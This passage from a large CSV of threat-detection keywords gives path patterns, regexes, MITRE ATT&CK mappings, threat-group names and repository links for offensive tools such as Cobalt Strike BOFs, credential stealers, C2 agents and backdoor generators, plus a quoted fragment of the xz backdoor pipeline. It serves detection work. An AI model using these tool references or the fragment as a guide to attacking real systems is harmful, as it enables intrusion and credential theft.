T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","N/A","10","10","151","23","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z","11866" "*/test64.dll*",".{0,1000}\/test64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic 
Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","N/A","10","10","151","23","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z","11867" "*/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|*",".{0,1000}\/tests\/files\/good\-large_compressed\.lzma\|eval\s\$i\|tail\s\-c\s\+31265\|.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#linux","rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","10","10","N/A","N/A","N/A","N/A","11868" "*/tests/NIST_CAVS/*.rsp*",".{0,1000}\/tests\/NIST_CAVS\/.{0,1000}\.rsp.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","11869" 
"*/tests/test-bof.ps1*",".{0,1000}\/tests\/test\-bof\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","11870" "*/tevora-threat/PowerView*",".{0,1000}\/tevora\-threat\/PowerView.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 
- T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","11871" "*/TFG/src/helpers/execve_hijack*",".{0,1000}\/TFG\/src\/helpers\/execve_hijack.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","11872" 
"*/tftp-enum.nse*",".{0,1000}\/tftp\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11873" "*/TGSThief.git*",".{0,1000}\/TGSThief\.git.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","N/A","9","2","181","27","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z","11874" "*/TGSThief/*",".{0,1000}\/TGSThief\/.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","N/A","9","2","181","27","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z","11875" "*/TGT_Monitor.git*",".{0,1000}\/TGT_Monitor\.git.{0,1000}","offensive_tool_keyword","TGT_Monitor","This script continuously monitors cache for new TGTs and displays them on the screen (admin privs required)","T1557.001 - T1040","TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/TGT_Monitor","1","1","N/A","N/A","9","1","3","0","2023-11-08T18:48:55Z","2023-11-07T22:53:45Z","11876" "*/TGT_Monitor.ps1*",".{0,1000}\/TGT_Monitor\.ps1.{0,1000}","offensive_tool_keyword","TGT_Monitor","This script continuously monitors cache for new TGTs and displays them on the screen (admin privs required)","T1557.001 - T1040","TA0006 - TA0008","N/A","N/A","Lateral 
Movement","https://github.com/Leo4j/TGT_Monitor","1","1","N/A","N/A","9","1","3","0","2023-11-08T18:48:55Z","2023-11-07T22:53:45Z","11877" "*/tgtParse.py*",".{0,1000}\/tgtParse\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","11878" 
"*/tgtParse/tgtParse.*",".{0,1000}\/tgtParse\/tgtParse\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","11879" "*/thanatos.dll*",".{0,1000}\/thanatos\.dll.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - 
T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","1","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","11880" "*/thanatos.exe*",".{0,1000}\/thanatos\.exe.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","1","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","11881" "*/thanatos.git*",".{0,1000}\/thanatos\.git.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","1","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","11882" "*/thanatos/releases/*",".{0,1000}\/thanatos\/releases\/.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","1","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","11883" "*/thanatos/releases/latest*",".{0,1000}\/thanatos\/releases\/latest.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 
- T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","1","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","11884" "*/thanatos/thanatos/agent_code/*",".{0,1000}\/thanatos\/thanatos\/agent_code\/.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#linux","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","11885" "*/thc-hydra/*",".{0,1000}\/thc\-hydra\/.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","11886" "*/the-backdoor-factory.git*",".{0,1000}\/the\-backdoor\-factory\.git.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","11887" "*/TheFatRat*",".{0,1000}\/TheFatRat.{0,1000}","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Screetsec/TheFatRat","1","0","#linux","N/A","N/A","10","9941","2324","2024-03-17T12:09:38Z","2016-07-24T10:30:19Z","11888" 
"*/theHarvester.py*",".{0,1000}\/theHarvester\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","11889" "*/theHarvester.py*",".{0,1000}\/theHarvester\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","11890" "*/theHarvester.py*",".{0,1000}\/theHarvester\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","11891" "*/Theif.dll*",".{0,1000}\/Theif\.dll.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","11892" "*/ThemeBleed.exe*",".{0,1000}\/ThemeBleed\.exe.{0,1000}","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tool","https://github.com/gabe-k/themebleed","1","0","N/A","N/A","10","2","196","37","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z","11893" 
"*/thief.py*",".{0,1000}\/thief\.py.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","11894" "*/ThievingFox.git*",".{0,1000}\/ThievingFox\.git.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","1","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","11895" "*/ThievingFox.py*",".{0,1000}\/ThievingFox\.py.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","1","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","11896" "*/thirdparty/msf/*",".{0,1000}\/thirdparty\/msf\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","0","#linux","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","11897" "*/ThisIsNotRat.git*",".{0,1000}\/ThisIsNotRat\.git.{0,1000}","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","N/A","9","10","64","17","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z","11898" "*/thoth.git*",".{0,1000}\/thoth\.git.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","11899" "*/thread-injector.exe*",".{0,1000}\/thread\-injector\.exe.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","11900" "*/ThreadlessInject.git*",".{0,1000}\/ThreadlessInject\.git.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","N/A","10","8","751","88","2024-09-04T17:11:58Z","2023-02-05T13:50:15Z","11901" "*/Thread-Pool-Injection-PoC.git*",".{0,1000}\/Thread\-Pool\-Injection\-PoC\.git.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for 
thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","1","N/A","N/A","8","2","115","13","2025-03-29T23:14:47Z","2024-01-24T07:42:08Z","11902" "*/ThreatCheck.git*",".{0,1000}\/ThreatCheck\.git.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","11903" "*/Throwback.git*",".{0,1000}\/Throwback\.git.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","11904" "*/ThrowbackDLL/*",".{0,1000}\/ThrowbackDLL\/.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","11905" "*/ThunderDNS*",".{0,1000}\/ThunderDNS.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","N/A","10","10","410","63","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z","11906" "*/ThunderFox.exe*",".{0,1000}\/ThunderFox\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black 
Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11907" "*/thycotic_secretserver_dump.rb*",".{0,1000}\/thycotic_secretserver_dump\.rb.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","1","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","11908" "*/ticket_converter.py*",".{0,1000}\/ticket_converter\.py.{0,1000}","offensive_tool_keyword","ticket_converter","A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket.","T1558.003 - T1110.004","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/zer1t0/ticket_converter","1","1","N/A","N/A","10","2","167","31","2022-06-16T19:38:05Z","2019-05-14T04:48:19Z","11909" "*/ticketConverter.exe*",".{0,1000}\/ticketConverter\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
